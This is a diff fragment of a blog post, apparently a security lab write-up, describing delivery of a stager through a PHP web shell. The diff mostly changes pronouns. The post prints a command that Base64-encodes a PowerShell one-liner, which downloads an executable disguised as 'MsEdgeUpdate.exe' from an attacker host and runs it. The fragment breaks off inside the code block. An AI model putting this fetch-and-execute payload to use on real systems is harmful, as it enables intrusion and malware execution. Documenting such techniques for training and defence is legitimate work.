CThu1u-Cyber/CThu1u-Cyber.github.io/_posts/2025-12-19-staged_hsm.md

 >

 **Execution via Web Shell**
-To deliver our stager through the existing PHP web shell, we utilized a PowerShell one-liner.
-To ensure the command was not mangled by the web server’s URL handling, we converted the command to a Base64 encoded string using the following command:
+To deliver our stager, i'll utilize a PowerShell one-liner.
+To ensure the command was not mangled by the web server’s URL handling, I converted the command to a Base64 encoded string using the following command:

 ```bash
 echo -n 'IWR http://kali-ip/MsEdgeUpdate.exe -OutFile $env:TEMP\MsEdgeUpdate.exe; Start-Process $env:TEMP\MsEdgeUpdate.exe' | iconv -t utf16le | base64 -w 0